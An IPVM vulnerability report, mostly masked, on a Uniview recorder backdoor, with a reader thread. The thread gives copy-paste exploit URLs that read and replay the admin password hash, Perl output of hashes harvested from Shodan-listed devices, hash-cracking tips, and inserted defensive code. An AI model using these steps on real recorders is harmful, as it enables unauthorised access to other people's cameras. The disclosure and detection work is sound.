Uniview Recorder Backdoor Examined

By: Brian Karas, Published on Oct 20, 2017

A Chinese research group has identified a vulnerability in Uniview recorders that allows backdoor access in a method similar to the Dahua backdoor.

IPVM spoke with the researcher behind the discovery and Uniview to determine the severity and impact of this discovery.

In this report we share Uniview's response and our analysis.

Samsung ************* ****** / ******** ******* ***

*** *** ****** *****, ***-****-*****, ********* **** ************* for *******, *** *******. IPVM *** ******** **** the ************* ** ** Uniview ********* *** **** Samsung / ****** *** OEMing * ******* ****** of ******* ********* ****** China. *** *********** *** tested * ******* ***** model *** **** *** aware ** *** **** of *** ****** ** the ************ ******* ******* and *******.

* ********** ** * Uniview ***-**** [**** ** longer *********] (***) *** the *******-******* **** **** for *** ******** (******) show *** ******** ************ between *** *****:

Vulnerability ********

*** ************* ******** * process ** ********** * URL **** *** ******** ***** contains * **** ** the ***** ********. **** hash *** **** ** **** to ********** *** *** login, ******* *** ***-********* hash **** ** *** unit ******* ** ******* on * ****-******** ********. Doing ** ****** * user ** ***** ** the ***** *** ********* with ***** **********, *** perform *** ******** ********* to *** ***** ****.

Researcher ********

*** ******* ****** *** discovery, "******* ******** *******" contacted **** ***** ********* filing *** ***, ******* they **** * ******** research ************ ***** ** Beijing. **** ** *** have * *******, *** were ********** ** *****, providing ********** *******, **** as ***** # *** firmware ** *** **** tested, *** *****.

** **** *** **** evidence *** ********** ********* ******* / ****** ****** **********. Typically *********** ******* ************* of ********* ************* ** ******** vendors ** **** ** the ********** *******.

Models ********

****** **** **** *** ************* ******* to ***** ********* *** not ** *******. *** company *** *** ******* specific ****** ** ******** versions ********, *** **** they **** ******* **** information **** ******* ******** is *********, ********* ******** for ******* **** ****.

**** ******* ** ******** available ***** (*** ******) showed *** ************* ******** all ******* ********* ******.

****** (*** *** ****** Samsung) ****** *** ********* China-only ****** *** ********:

  • ***-****
  • ***-****
  • ***-*****

Ease ** ******* - *******

********** **** ************* **** requires ********** *** ***** password **** **** *** URL, *** **** ******* that **** **** ******* URL ** ***** ** the **** ** *****. This *** ** **** in *** *****:

  1. *** *** ***** ******** hash ***** **** ***: http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}  (**** *** "*************", *** string ** ********** ***** is *** ***** ******** hash)
  2. *** ** ** ***** to * ******* ******** using **** ***: ****://**.***.**.**:****/***-***/****-***?****=*&**********=*****&************=***********************

*******, **** ************* ** very **** ** ******* and **** *** ******* any ******** *********** ** scripting *********.

Minimal ******-****** *******

******* **** *** ******* recorder *********** ***** **** *** ******* online, **** *** ******** of **** ***** ** the **:

Uniview ****, *** ********

[*******]

******* *** ***** ********* updated ******** *** **** vulnerability. ********* ** *** company, *** ******* *** to *****/******* ** ** use *** ********'* *****-** cloud ******* *****. **** Setup->Maintenance ***** ****** ** a "*****" ****** ** check *** *** ********:

******** *** "*****" ****** will ***** *** ******** to ***** *** ******* firmware *** ******* *** option ** *******:

******* ******** *** ********* **** for ********** **** *************:

*.******* **** ******* * new ******** ****** ** solve *** ***** ** the ******* ****. *** ****** ******* will ** ********.

*.******* **** ******* *** fixed ******** *** ******* products ** ***. ****.

*.******* **** ******* * new ******** ** *** of ******** ***** **** use * ******* *** CGI ****** *** ***** security ************** *** **** other ******** ****.

*** *** ****** **** and ******* ** ******** that *** ******** ** this *************, ** **** release ** ******** ********* simultaneously **** ** ******* the *** ********.

** ** *** ******* Uniview *** ******** ** this ************* ****** ** contacted ****, *** **** were ********** ** ** once **** ***** ** the *****.

OEM *****

**** ************* ***** ******* example ** *** ***** ********** with relying ** *** *************. Samsung ****** ****** ** Uniview ** * *** to **** ***** ** the ******* ***** ***** units **** ****, *** they **** ****** ** their ***** *** ** the *************. *******, ***** associated **** ********** **** may **** *** *** savings. ******* **** ***** backlash **** ******** ********* realize **** *** *** get ** '*********' ******* product, *** **** ******* is ****** ******* ** Uniview ** ******* **** issue.

***** ** *******'* ******* schedule *** ******** *******, it ** ***** **** Uniview's ******* ******* ** fixing ***** *** ***** before ********** **** *** the *** ********. ******* prioritization *** **** **** previously **** ***** *** Hikvision **** **** *** similar *************** ** *******, showing **** *** ********* are ***** *** ******** when *** *** **** sells ******* ***** ***** own ***** ** *** same *******.

Comments (36)

IPVM testing of publicly available units (via Shodan) showed the vulnerability affected all Uniview recorders tested.

 

As a direct wholesaler of Uniview products, this is of great concern.  Once I read this article, I had my operations manager as well as the tech department run some tests to see if the branded Uniview recorders that we sell were vulnerable.  We have not been able to replicate this vulnerability.  Can I assume that the only models vulnerable are the OEMs for Samsung?

Rich -

What did you do for a test? When you say you could not replicate it, what happened?

Uniview themselves confirmed this affects more than just the Samsung OEMs, but as stated in the report, did not clarify specific models affected.

If you can share your test/validation process and model/firmware it might help others in determining which units are vulnerable or not. 

I just pulled a few pages of IPs from the Shodan search and ran a quick test to see which units would respond to the initial request that attempts to read the hashed password, eg:

http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}

 

Reading this file is the core part of the vulnerability (if you cannot get the hashed password from the unit, you cannot exploit it with this method).

All but one of the IPs I tried gave me a response I was able to extract a password hash from - sample below:

BRK-Air-46:PerlStuff brk$ ./UNVTest.pl
Testing...
Found password:
"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e"
Testing...
Found password:
"szLoginPasswd": "33d130f7ed0c7998b41e37d46a4d5d14"
Testing...
Could not get password hash.
Testing...
Found password:
"szLoginPasswd": "33d130f7ed0c7998b41e37d46a4d5d14"
Testing...
Found password:
"szLoginPasswd": "aca257be08c76a57e2a4a721d9af85e3"
Testing...
Found password:
"szLoginPasswd": "33d130f7ed0c7998b41e37d46a4d5d14"
Testing...
Found password:
"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e"
Testing...
Found password:
"szLoginPasswd": "770c13cf6390d7877c11fcdfb3659100"
Testing...
Found password:
"szLoginPasswd": "7ca595ec2cb9a52462baf8a50e5c9aa6"
Testing...
Found password:
"szLoginPasswd": "c4c19a1769c8630b5c53127c75d46221"
Testing...
Found password:
"szLoginPasswd": "7ca595ec2cb9a52462baf8a50e5c9aa6"
Testing...
Found password:
"szLoginPasswd": "c4c19a1769c8630b5c53127c75d46221" 

I would be curious what your model # and firmware build are if you cannot get the password hash back from the device.

My lead tech is going through each and every model right now to include the older 200 series models.  I will get back with you.

Found password:
"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e"

If you get a hash, google it, as there are websites containing reverse lookup tables for hashes of common passwords with different hashing algorithms. For instance, googling "e10adc3949ba59abbe56e057f20f883e" from Brian's list above will give you "123456" (hashed using md5), which is probably the user password.

So it looks like they are just storing md5 hashes of the password. They should be using salted hashes at a minimum.
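To show the difference the comment above is pointing at, here is an added example (not code from IPVM or Uniview) contrasting the bare MD5 storage inferred from the thread with a salted, iterated scheme; PBKDF2-HMAC-SHA256 is chosen here as an assumption, any modern password hash would serve.

```python
import hashlib
import hmac
import os


def weak_store(password: str) -> str:
    """Bare MD5 as apparently used by the recorder: no salt, no work factor.
    Identical passwords give identical hashes (compare the repeated values in
    the list above) and the hash is searchable in public lookup tables."""
    return hashlib.md5(password.encode()).hexdigest()


def strong_store(password: str, salt=None, rounds: int = 200_000) -> str:
    """Per-user random salt plus PBKDF2-HMAC-SHA256 (example choice).
    Format: algo$rounds$salt_hex$digest_hex, so parameters travel with the record."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${digest.hex()}"


def strong_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; constant-time comparison."""
    try:
        algo, rounds, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_password_collides(password: str):
    """Do two users sharing a password get the same stored value?
    Returns (weak_scheme_collides, strong_scheme_collides)."""
    weak_a, weak_b = weak_store(password), weak_store(password)
    strong_a, strong_b = strong_store(password), strong_store(password)
    return weak_a == weak_b, strong_a == strong_b


if __name__ == "__main__":
    print("weak  :", weak_store("123456"))       # the hash quoted in the thread
    print("strong:", strong_store("123456"))
    print("collides (weak, strong):", same_password_collides("123456"))
```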

Yes, good point. I debated getting into using rainbow tables to try and just crack the hashes without even messing with POST manipulations but decided to keep it more brief. But if the user has a weak password this creates even more risk/ease of exploit. 

Agreed, it's more a sign of amateurism than part of the actual exploit. It's the reason I use different passwords for every product, website etc unless I really trust the company to store the passwords correctly. Otherwise one account gets hacked and they have your credentials for everything.

I've tried sending my tech's findings since Friday and it will not post.

You can email it to me: bkaras@ipvm.com

 

eager to see the findings

IPVM testing of publicly available units (via Shodan) showed the vulnerability affected all Uniview recorders tested.

What was the test?

Is there a list of other Uniview OEMs?

easterncctv, Revo and DH-Vision.

Here is a link to Uniview's website which shows who are their direct wholesalers in America.  We do not OEM at this time, we only sell branded Uniview products.  The question was who sells OEM Uniview:

http://en.uniview.com/About_Us/Partner/Partners/North_America/

 

The most interesting part in the whole request is that 'szUserName' is NULL, and the request does query for "admin".

http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}

I wonder how 'user' NULL can fall through the authentication mechanism by 'mistake' and then be able to pull off sensitive data with admin privileges...

 

How hard is it to find these back doors? Or if you are a programmer, how hard is it to know this is a flaw? How preventable is this?

 

Here's the thing. My sub-division has a Facebook page. Once in a while we hear of people waking up and their cars being gone through. When I hear my neighbor Dale got robbed, I make sure I lock my car. When my neighbor Hilda gets robbed, I double down, check all the doors on my car, lock the house, and ensure my cameras are working.

 

I just can't imagine how a 3rd Chinese company could have these issues.

 

 

Or if you are a programmer, how hard is it to know this is a flaw? How preventable is this?

In my experience, it is partly programmers to blame, and partly management.

At some point a developer needs to study what is required to write secure code, e.g. reading a book such as this one. If they don't they are likely to invent their own solutions, make common mistakes etc. In our industry, any insecure code a developer writes is likely to go straight to the customer i.e. testing departments won't pick it up, that's for sure, it is a specialized type of testing skill that they don't have.

It can take a developer weeks to make a product resistant to hacking during which nothing they do translates into any visible features. So to some managers, it can look like they are not getting any work done during this time. If they want praise, they tend to work on features that sales people, managers, end users can actually see and touch. Likewise, managers are under pressure from sales people, CEOs etc and it is often security that gets lowest priority in favor of features that can be listed as bullet points on marketing brochures. 

So if you buy a software product where security is important, you hope it was written by a conscientious developer, or that the company knows about the problem and deals with it at a management level.

 

I totally agree, and to make matters worse the engineers / code writers and management all move around between companies on a regular basis.

So a mistake at one manufacturer is replicated at another until it is discovered.

 

How hard is it to find these back doors?

Not so easy, you will need to spend some time reading and try to understand the code

Or if you are a programmer, how hard is it to know this is a flaw?

Dahua, Hikvision and now Uniview - these are no flaws, this is way too easy to exploit and way too portable to be 'flaws'

How preventable is this?

Question you should ask the manufacturer who put it in there

I just can't imagine how a 3rd Chinese company could have these issues.

Unfortunately, I think you will need to get used to this for a while....

 

Just for fun I did some research too (as I'm curious), and I actually don't think anymore it's a backdoor, it's worse than that - they have absolutely no security whatsoever.

All OS calls are done purely with 'system()', and no sanitation whatsoever of user provided input, which gives full remote code execution (RCE) with some functions.

I thought Dahua was horrible, but Uniview passed down to absolutely bottom.

 

I thought Dahua was horrible, but Uniview passed down to absolutely bottom.

You must not be familiar with Xiongmai...

Actually been checking XM too, question I have there is who forked who.

Did Dahua fork XM, or did XM fork Dahua? (Personally I believe Dahua forked XM once)

Dahua didn't invent the 48bit hash, XM did.

Edit:

Proof for that you can find with this research: https://github.com/tothi/pwn-hisilicon-dvr

Actually been checking XM too, question I have there is who forked who.

Basically, Dahua "forked" everyone ;)

I thought Dahua was horrible, but Uniview passed down to absolutely bottom.

I suspect there's still a lot of others out there. About 1 year ago, I encountered a camera that completely ignored the username and password when connecting via RTSP. I told them about the problem, they denied it, I persisted and they eventually agreed to fix it. They didn't seem overly concerned about the problem at all.

By the way, the findings have been reported back to both the Chinese security researchers and also Hanwha security, who reached out to the Chinese security researchers on their GitHub. I'm sure they are already aware, but did that just in case they might not have been.

Now we see how badly the security is taken with the top 3 Chinese manufacturers.

So is anyone going to guess who's next to be published?

Would it be safe to say where most other development in China copies in some part from one of the big 3, it's a fair bet there are 100 or more less secure devices sitting all over the place.

Maybe they should go ask Tencent, a local company which has its own cyber security division; for a few RMB I bet they could tidy a lot of security issues.

Some people have commented they were having issues with the PostMan approach, which can be a bit awkward if you are not used to dealing with it. I spent a little time trying some other things, and realized you can do this all from the browser URL bar without anything fancy.

Two steps to test/exploit:

1) Get the admin password hash: http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}

2) Use it to login to a Uniview recorder: http://ip.add.re.ss:PORT/cgi-bin/main-cgi?lLan=0&szUserName=admin&szUserPasswd=PUT_THE_HASH_VALUE_HERE

Much easier/faster.  I just verified this worked on a few random Shodan results.
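For operators who run these recorders behind a proxy or keep web access logs, here is an added detection example (not code from IPVM, Uniview or the researchers) that flags the two request shapes quoted in this thread and correlates them by source address; the log lines are constructed in combined-log format with documentation-range IPs, and the only page-specific values used are the two URLs above and the MD5 hash already quoted in the comments.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines mirroring the two URLs quoted in this thread, a
# control request with a non-empty szUserName, and an unrelated page fetch.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Oct/2017:10:01:02 +0000] "GET /cgi-bin/main-cgi?json=%7B%22cmd%22%3A201%2C%22szUserName_Qry%22%3A%22admin%22%2C%22szUserName%22%3A%22%22%2C%22u32UserLoginHandle%22%3A0%7D HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.10 - - [20/Oct/2017:10:01:05 +0000] "GET /cgi-bin/main-cgi?lLan=0&szUserName=admin&szUserPasswd=e10adc3949ba59abbe56e057f20f883e HTTP/1.1" 200 98 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Oct/2017:10:02:00 +0000] "GET /cgi-bin/main-cgi?json=%7B%22cmd%22%3A201%2C%22szUserName_Qry%22%3A%22admin%22%2C%22szUserName%22%3A%22admin%22%2C%22u32UserLoginHandle%22%3A7%7D HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Oct/2017:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
HEX32 = re.compile(r"[0-9a-fA-F]{32}")  # shape of the MD5 hashes seen in the thread


def classify_request(target):
    """Label a request target (path + query) or return None if not suspicious."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/main-cgi"):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    # Step 1 in the thread: cmd 201 user query sent with an empty szUserName,
    # i.e. no logged-in user, yet the reply carries the admin password hash.
    if "json" in q:
        try:
            body = json.loads(q["json"][0])
        except ValueError:
            return None
        if body.get("cmd") == 201 and body.get("szUserName") == "":
            return "unauthenticated_hash_read"
    # Step 2 in the thread: a login whose szUserPasswd is a 32-hex hash rather
    # than a cleartext password, i.e. replay of a hash obtained in step 1.
    pwd = q.get("szUserPasswd", [""])[0]
    if "szUserName" in q and HEX32.fullmatch(pwd):
        return "hash_replay_login"
    return None


def scan_log(text):
    """Return one finding dict per suspicious line, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m["target"])
        if label:
            findings.append({"ip": m["ip"], "ts": m["ts"], "label": label})
    return findings


def correlate(findings):
    """Source IPs that performed both steps: the strongest takeover signal."""
    seen = {}
    for f in findings:
        seen.setdefault(f["ip"], set()).add(f["label"])
    both = {"unauthenticated_hash_read", "hash_replay_login"}
    return sorted(ip for ip, labels in seen.items() if both <= labels)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("both steps from:", correlate(hits))
```

A single hash_replay_login hit from an address that never issued step 1 may be a legitimate client that hashes client-side, so the correlated pair is the finding to alert on first.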

 

[IPVM Note: Poster is a Uniview Partner.]

Should this be posted as it is an EXPLICIT instruction on how to perform an illegal act by accessing other people's electronic devices without permission???

I was also curious on this as well. I also said "hmmm" in my mind when Brian said he tried it on some Shodan results.

[IPVM Note: Poster is a Uniview Partner.]

So, technically Brian has admittedly broken the law.

Not exactly, step #1 checking whether the URL exists could be done legally, and indicates whether the vulnerability is found.

step #2 is not necessary.

Some discussion of this here: Should I Hack 10,000 Dahua Cameras?

What we posted is effectively the same information as what is contained in the publicly available CVE.

The purpose of this report is to allow members who may use, sell, install, or service Uniview equipment to determine if their systems are vulnerable so that they can act appropriately to patch or secure them. 

We are certainly not recommending that people use this info for any kind of illicit purposes.

I respect your reporting of an important security flaw, but do you really think that it's beneficial and responsible to provide a cut-and-pasteable (sp?) example on how to exploit this?  While I'm sure most people here will use this in the manner in which it was intended, what happens when it falls into the wrong hands and people start logging in to units around the world illegally because you provided them the means to do so?  While this may be effectively the same information available to the public via CVE, you have taken it to a well-read, semi-public site and simplified it so that anyone can use it within 30 seconds.

I understand your concern, however I do not believe we have enabled the kinds of people who would want to use this vulnerability (or others we have similarly covered for other companies) with any knowledge they could not already easily figure out on their own. This is an extremely simple exploit, even in the first example shown. The core concept, passing back expected values in an HTTP POST, is almost as simple as it gets (the only one even less complex was Hikvision's Magic String Backdoor).

The flip side of this is that it has already been shown by some manufacturers that if we do not make it explicitly clear how easy some of these exploits are, how many systems are online, and the capabilities they expose to hackers that they will be spun as less risky than they really are. Or, people look at it and think "that won't happen to me, it takes too much effort to really pull off."

 

[UPDATE]

Uniview has begun releasing updated firmware for this vulnerability. According to the company, the easiest way to check/upgrade is to use the recorder's built-in cloud upgrade check. From Setup->Maintenance there should be a "Check" button to check for new firmware:

Clicking the "Check" button will cause the recorder to check for updated firmware and provide the option to upgrade:

an upgrade button that actually works?!?! Revolutionary!